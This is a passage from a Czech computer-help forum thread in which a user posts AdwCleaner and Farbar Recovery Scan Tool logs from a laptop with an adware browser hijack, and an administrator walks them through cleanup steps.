Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\api-ms-win-core-synch-l1-2-0.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-5500U CPU @ 2.40GHz
Percentage of memory in use: 48%
Total physical RAM: 8083.11 MB
Available physical RAM: 4159.84 MB
Total Virtual: 16164.4 MB
Available Virtual: 12194.01 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:220.26 GB) (Free:154.09 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (HP_RECOVERY) (Fixed) (Total:15.21 GB) (Free:1.67 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (HP_TOOLS) (Fixed) (Total:1.99 GB) (Free:1.95 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 8E59DEA1)
Partition 1: (Active) - (Size=1 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=220.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=15.2 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=2 GB) - (Type=0B)

==================== End of Addition.txt ============================
Nahoru
Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118244
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:
Kontaktovat uživatele Rudy

Re: Kontrola, pracovní NTB

#3 Příspěvek od Rudy »

Zdravím!
Spusťte tuto utilitu:
Stáhněte AdwCleaner https://toolslib.net/downloads/viewdown ... dwcleaner/
Uložte na plochu
Ukončete všechny programy
Klikněte nejprve na >Scan<(hledání) a pak na >Clean< (mazání).
Proběhne skenováni a pak se objeví log, který sem vložte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Nahoru
Tesla
Vzorný návštěvník
Vzorný návštěvník
Příspěvky: 94
Registrován: 02 pro 2005 17:10
Bydliště: Praha

Re: Kontrola, pracovní NTB

#4 Příspěvek od Tesla »

Děkuji za odpověď v pozdní večerní hodině.

Log zde:

# AdwCleaner v6.045 - Log vytvořen 09/04/2017 v 22:41:25
# Aktualizováno dne 28/03/2017 z Malwarebytes
# Databáze : 2017-04-06.1 [Server]
# Operační systém : Windows 7 Professional Service Pack 1 (X64)
# Uživatelské jméno : tesla - NTB-55
# Spuštěno z : C:\Users\Tesla\Desktop\adwcleaner_6.045.exe
# Mod: Čištění
# Podpora : https://www.malwarebytes.com/support



***** [ Služby ] *****



***** [ Složky ] *****



***** [ Soubory ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Zástupci ] *****



***** [ Naplánované úlohy ] *****

[-] Úloha smazána: Kooing


***** [ Registry ] *****

[-] Klíč smazán: HKU\.DEFAULT\Software\ecb`nl
[#] Klíč smazán po restartu: HKU\S-1-5-18\Software\ecb`nl
[-] Klíč smazán: HKLM\SOFTWARE\ecb`nl
[-] Klíč smazán: HKLM\SOFTWARE\msServer
[-] Klíč smazán: [x64] HKLM\SOFTWARE\ecb`nl


***** [ Prohlížeče ] *****

[-] Firefox předvolby vyčištěny: "browser.newtab.url" - "hxxp://www.initialpage123.com/?z=b3b485c3bdaa0 ... 24&type=hp"
[-] Firefox předvolby vyčištěny: "browser.search.searchengine.hp" - "hxxp://www.initialpage123.com/?z=b3b485c3bdaa0 ... 24&type=hp"
[-] Firefox předvolby vyčištěny: "browser.search.searchengine.sp" - "hxxp://www.initialpage123.com/search/?from=dam ... 9bdo2w5wbg"
[-] Firefox předvolby vyčištěny: "browser.search.searchengine.url" - "hxxp://www.initialpage123.com/search/?from=dam ... 9bdo2w5wbg"
[-] Firefox předvolby vyčištěny: "browser.startup.homepage" - "hxxp://www.initialpage123.com/?z=b3b485c3bdaa0 ... 24&type=hp"


*************************

:: "Tracing" klíče smazány
:: Winsock nastavení vyčištěno

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [2186 Bajty] - [09/04/2017 22:41:25]
C:\AdwCleaner\AdwCleaner[S0].txt - [2628 Bajty] - [09/04/2017 22:41:08]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [2332 Bajty] ##########
Nahoru
Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118244
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:
Kontaktovat uživatele Rudy

Re: Kontrola, pracovní NTB

#5 Příspěvek od Rudy »

Dejte nový log FRST.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Nahoru
Tesla
Vzorný návštěvník
Vzorný návštěvník
Příspěvky: 94
Registrován: 02 pro 2005 17:10
Bydliště: Praha

Re: Kontrola, pracovní NTB

#6 Příspěvek od Tesla »

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-03-2017
Ran by Tesla (administrator) on NTB-55 (10-04-2017 19:28:42)
Running from C:\Users\Tesla\Desktop
Loaded Profiles: Tesla (Available Profiles: Tesla & Administrator)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Čeština (Česká republika)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
(DigitalPersona, Inc.) C:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DpHostW.exe
(DigitalPersona, Inc.) C:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DpCardEngine.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Validity Sensors, Inc.) C:\Windows\System32\vcsFPService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Theft Recovery\CtService.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\HPFSService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\ibtsiva.exe
() C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpnserv.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Hewlett-Packard Company) C:\Windows\SysWOW64\flcdlock.exe
(Hewlett-Packard Development Company) C:\Program Files (x86)\Hewlett-Packard\HP Device Access Manager\HP.ProtectTools.DeviceAccessManager.ServiceHost.exe
(Intel) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(DigitalPersona, Inc.) C:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DPAgent.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cistray.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(DigitalPersona, Inc.) C:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DpAgent.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTsysTray8.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Pixart Imaging Inc) C:\Windows\System32\TiltWheelMouse.exe
(Spotify Ltd) C:\Users\Tesla\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\QLBController.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\CORESHREDDER.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cis.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [320360 2014-06-25] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7659224 2014-11-11] (Realtek Semiconductor)
HKLM\...\Run: [ISCT Tray] => c:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTsysTray8.exe [5860656 2014-08-14] (Intel Corporation)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2863344 2014-10-31] (Synaptics Incorporated)
HKLM\...\Run: [COMODO Internet Security] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1476288 2017-04-05] (COMODO)
HKLM\...\Run: [MouseDriver] => C:\Windows\system32\TiltWheelMouse.exe [241152 2012-12-19] (Pixart Imaging Inc)
HKLM-x32\...\Run: [HPConnectionManager] => c:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPCMDelayStart.exe [185144 2014-04-10] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [QLBController] => C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\QLBController.exe [425608 2014-10-04] (Hewlett-Packard Company)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [293872 2014-08-25] (Intel Corporation)
HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-04-01] (Hewlett-Packard Company)
HKLM-x32\...\Run: [YouCam Tray] => c:\Program Files (x86)\CyberLink\YouCam\YouCamTray.exe [167488 2013-09-17] (CyberLink Corp.)
HKLM-x32\...\Run: [HP File Sanitizer] => C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\Coreshredder.exe [2213592 2014-02-05] (Hewlett-Packard)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [28329912 2017-04-06] (Dropbox, Inc.)
HKLM\...\Winlogon: [Userinit] C:\Windows\system32\userinit.exe,c:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DPAgent.exe,
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\...\Run: [OPENVPN-GUI] => C:\Program Files\OpenVPN\bin\openvpn-gui.exe [582784 2016-12-27] ()
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\...\Run: [Spotify Web Helper] => C:\Users\Tesla\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-04] (Spotify Ltd)
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4701888 2017-02-07] (Disc Soft Ltd)
Lsa: [Notification Packages] DPPassFilter scecli
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-06] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
GroupPolicy: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 213.46.172.36 213.46.172.37
Tcpip\..\Interfaces\{A17B1C3A-B9EB-46A9-845E-AF78FF44CAEE}: [DhcpNameServer] 192.168.1.7
Tcpip\..\Interfaces\{AEC2C183-CD66-4548-AD0F-3B1F9522AA2A}: [DhcpNameServer] 213.46.172.36 213.46.172.37

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com?pc=CMNTDFJS
HKU\S-1-5-21-3530450637-73980329-3277372514-2116\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.bing.com?pc=CMNTDFJS
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-06] (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-04-08] (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\URLREDIR.DLL [2017-03-06] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-06] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-04-08] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: HP File Sanitizer -> {3134413B-49B4-425C-98A5-893C1F195601} -> C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\IEBHO.dll [2014-02-05] (Hewlett-Packard)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\URLREDIR.DLL [2017-03-06] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: zjx1fd7i.default
FF ProfilePath: C:\Users\Tesla\AppData\Roaming\Mozilla\Firefox\Profiles\zjx1fd7i.default [2017-04-09]
FF NewTab: Mozilla\Firefox\Profiles\zjx1fd7i.default -> hxxp://www.initialpage123.com/?z=b3b485c3bdaa0 ... 24&type=hp
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\zjx1fd7i.default -> initialpage123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\zjx1fd7i.default -> initialpage123
FF Homepage: Mozilla\Firefox\Profiles\zjx1fd7i.default -> hxxp://www.initialpage123.com/?z=b3b485c3bdaa0 ... 24&type=hp
FF SearchPlugin: C:\Users\Tesla\AppData\Roaming\Mozilla\Firefox\Profiles\zjx1fd7i.default\searchplugins\59agja1f.xml [2017-04-08]
FF Extension: (Site Deployment Checker) - C:\Program Files (x86)\Mozilla Firefox\browser\features\deployment-checker@mozilla.org.xpi [2017-03-24] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [dpmaxz_ng@jetpack] - c:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\BrowserExt\dpchrome
FF Extension: (HP Client Security Manager) - c:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\BrowserExt\dpchrome [2015-06-10] [not signed]
FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-04-08] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-04-08] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2013-12-18] ()
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2013-12-18] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-06] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-04-09] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-04-09] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-01-18] (Adobe Systems Inc.)
FF Plugin-x32: digitalpersona.com/ChromeDPAgent -> c:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\BrowserExt\components\npChromeDPAgent.dll [2014-06-26] (DigitalPersona, Inc.)

Chrome:
=======
CHR Profile: C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default [2017-04-10]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-04-09]
CHR Extension: (Adblock Plus) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-04-09]
CHR Extension: (No Name) - C:\Users\Tesla\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-09]
